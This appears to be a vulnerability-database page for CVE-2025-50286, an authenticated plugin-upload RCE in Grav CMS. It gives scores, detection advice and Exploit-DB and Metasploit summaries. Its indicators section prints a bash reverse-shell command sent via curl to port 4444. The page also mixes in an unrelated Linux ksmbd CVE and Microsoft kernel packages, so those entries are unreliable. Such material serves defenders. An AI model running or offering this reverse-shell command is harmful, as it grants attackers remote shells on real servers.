CVE-2025-50286
published 2025-08-06CVE-2025-50286: A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install…
PriorityP269high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
EXPLOIT
EPSS
8.71%
94.5th percentile
A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install interface. Once uploaded, the plugin is automatically extracted and loaded, allowing arbitrary PHP code execution and reverse shell access.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getgrav | grav | — | — |
| msrc | azl3_kernel_6.6.57.1-7_on_azure_linux_3.0 | — | — |
| msrc | cbl2_kernel_5.15.180.1-1_on_cbl_mariner_2.0 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http:///↗
- →Monitor HTTP POST requests to /admin/tools/direct-install containing ZIP file uploads; malicious archives follow the structure of a plugin directory with a PHP file and blueprints.yaml. ↗
- →Alert on web server processes (e.g., www-data/apache2) spawning outbound TCP connections or bash reverse shells, particularly to non-standard ports such as 4444. ↗
- →Detect newly created PHP files under the Grav plugins directory following a ZIP upload to the Direct Install endpoint, as the uploaded plugin is written to disk and executed by the application. ↗
- ·Exploitation requires valid admin-level credentials; this is an authenticated RCE, not unauthenticated. Detection should focus on admin-authenticated sessions performing plugin uploads. ↗
- ·The Metasploit module targets Grav CMS versions 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x; scope detection rules accordingly and do not apply to versions outside this range. ↗
- ·The NVD entry and exploit-db reference Grav CMS v1.7.48, while the Metasploit module extends coverage to <=1.7.49.5 / Admin Plugin <=1.10.49.3; ensure patching covers the full affected range. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_msrc7.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wqvw-453m-rjm2: A Remote Code Execution (RCE) vulnerability in Grav CMS v1
ghsa_unreviewed·2025-08-06
CVE-2025-50286 [HIGH] CWE-434 GHSA-wqvw-453m-rjm2: A Remote Code Execution (RCE) vulnerability in Grav CMS v1
A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install interface. Once uploaded, the plugin is automatically extracted and loaded, allowing arbitrary PHP code execution and reverse shell access.
Microsoft
ksmbd: fix slab-use-after-free in ksmbd_smb2_session_create
vendor_msrc·2024-11-12·CVSS 7.0
CVE-2024-50286 [HIGH] CWE-416 ksmbd: fix slab-use-after-free in ksmbd_smb2_session_create
ksmbd: fix slab-use-after-free in ksmbd_smb2_session_create
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mariner: Mariner
Linux: Linux
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Reference: https://l
No detection rules found.
Exploit-DB
Grav CMS 1.7.48 - Remote Code Execution (RCE)
exploitdb·2025-08-11·CVSS 8.1
CVE-2025-50286 [HIGH] Grav CMS 1.7.48 - Remote Code Execution (RCE)
Grav CMS 1.7.48 - Remote Code Execution (RCE)
---
# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286
# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a malicious plugin that contains arbitrary PHP code, which will be executed by the server upon access.
# Steps to Reproduce:
1. Start a listener on your attack machine
Metasploit
Grav CMS Admin Direct Install Authenticated Plugin Upload RCE
metasploit
Grav CMS Admin Direct Install Authenticated Plugin Upload RCE
Grav CMS Admin Direct Install Authenticated Plugin Upload RCE
Grav CMS version <=1.7.49.5 with Admin Plugin version <=1.10.49.3 is vulnerable to authenticated remote code execution via the "Direct Install" feature in the administrative interface. An authenticated administrator can upload a crafted plugin archive containing arbitrary PHP code. The uploaded plugin is written to disk and executed by the application, allowing command execution in the context of the web server user. This module authenticates to the admin panel, uploads a malicious plugin via /admin/tools/direct-install, and triggers execution of the embedded payload.
2025-08-06
Published